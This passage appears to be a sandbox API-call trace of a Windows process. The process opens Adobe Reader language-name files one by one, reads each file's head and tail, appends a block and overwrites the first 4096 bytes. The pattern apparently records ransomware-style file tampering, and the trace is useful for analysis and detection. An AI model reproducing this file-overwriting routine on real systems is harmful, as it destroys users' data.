SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.724] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.724] ReleaseMutex (hMutex=0x168) returned 1 [0085.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_HN.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0085.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_HN.txt", cchWideChar=30, lpMultiByteStr=0x1f8fcfc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_HN.txt", lpUsedDefaultChar=0x0) returned 30 [0085.724] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.726] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5ec8 [0085.726] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.727] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5ec8 [0085.728] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.728] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0085.728] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.729] CloseHandle (hObject=0x1d4) returned 1 [0085.729] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_US.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_us.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0085.730] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.730] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6ec8 [0085.730] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.730] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.731] ReleaseMutex (hMutex=0x168) returned 1 [0085.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_US.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0085.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_US.txt", cchWideChar=30, lpMultiByteStr=0x1f8fcfc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_US.txt", lpUsedDefaultChar=0x0) returned 30 [0085.731] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.010] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5ec8 [0086.011] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.011] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5ec8 [0086.012] WriteFile (in: hFile=0x1d4, lpBuffer=0x26663c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26663c8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.013] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0086.013] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0086.013] CloseHandle (hObject=0x1d4) returned 1 [0086.013] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi_FI_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi_fi_preeuro.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0086.014] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0086.014] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6d7a [0086.014] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0086.014] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.015] ReleaseMutex (hMutex=0x168) returned 1 [0086.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.fi_FI_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0086.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.fi_FI_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x1fa538c, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.fi_FI_PREEURO.txt", lpUsedDefaultChar=0x0) returned 38 [0086.015] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.017] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5d7a [0086.018] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.018] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5d7a [0086.018] WriteFile (in: hFile=0x1d4, lpBuffer=0x26663c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26663c8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.019] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0086.019] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0086.019] CloseHandle (hObject=0x1d4) returned 1 [0086.019] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hu.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hu.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0086.031] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0086.032] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6dfe [0086.032] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0086.032] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.032] ReleaseMutex (hMutex=0x168) returned 1 [0086.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.hu.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0086.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.hu.txt", cchWideChar=27, lpMultiByteStr=0x1f8fedc, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.hu.txt", lpUsedDefaultChar=0x0) returned 27 [0086.033] ReadFile (in: hFile=0x1d4, lpBuffer=0x2664368, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.039] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5dfe [0086.040] ReadFile (in: hFile=0x1d4, lpBuffer=0x2664368, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.040] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5dfe [0086.040] WriteFile (in: hFile=0x1d4, lpBuffer=0x26663c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26663c8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.041] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0086.041] WriteFile (in: hFile=0x1d4, lpBuffer=0x2664368*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0086.042] CloseHandle (hObject=0x1d4) returned 1 [0086.042] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja_JP_TRADITIONAL.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja_jp_traditional.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0086.074] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0086.074] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6594 [0086.074] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0086.074] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.074] ReleaseMutex (hMutex=0x168) returned 1 [0086.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ja_JP_TRADITIONAL.txt", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0086.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ja_JP_TRADITIONAL.txt", cchWideChar=42, lpMultiByteStr=0x1fb3d9c, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ja_JP_TRADITIONAL.txt", lpUsedDefaultChar=0x0) returned 42 [0086.075] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.077] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5594 [0086.077] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.078] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5594 [0086.078] WriteFile (in: hFile=0x1ec, lpBuffer=0x26663c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26663c8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.078] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0086.078] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0086.078] CloseHandle (hObject=0x1ec) returned 1 [0086.079] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nb_NO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nb_no.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0086.080] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0086.080] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6df2 [0086.080] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0086.080] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.080] ReleaseMutex (hMutex=0x168) returned 1 [0086.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.nb_NO.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0086.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.nb_NO.txt", cchWideChar=30, lpMultiByteStr=0x1f8fedc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.nb_NO.txt", lpUsedDefaultChar=0x0) returned 30 [0086.081] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.083] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5df2 [0086.083] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.084] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5df2 [0086.084] WriteFile (in: hFile=0x1ec, lpBuffer=0x26663c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26663c8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.085] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0086.085] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0086.086] CloseHandle (hObject=0x1ec) returned 1 [0086.086] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pl_PL.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pl_pl.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0086.088] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0086.088] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6e56 [0086.088] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0086.088] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.088] ReleaseMutex (hMutex=0x168) returned 1 [0086.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.pl_PL.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0086.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.pl_PL.txt", cchWideChar=30, lpMultiByteStr=0x1f8fedc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.pl_PL.txt", lpUsedDefaultChar=0x0) returned 30 [0086.089] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.091] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5e56 [0086.091] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.092] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5e56 [0086.092] WriteFile (in: hFile=0x1ec, lpBuffer=0x26663c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26663c8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.093] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0086.093] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0086.093] CloseHandle (hObject=0x1ec) returned 1 [0086.094] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru_UA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru_ua.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0087.271] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0087.271] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x7416 [0087.272] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0087.272] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0087.272] ReleaseMutex (hMutex=0x168) returned 1 [0087.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ru_UA.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0087.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ru_UA.txt", cchWideChar=30, lpMultiByteStr=0x1f8fedc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ru_UA.txt", lpUsedDefaultChar=0x0) returned 30 [0087.272] ReadFile (in: hFile=0x1f8, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0088.264] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 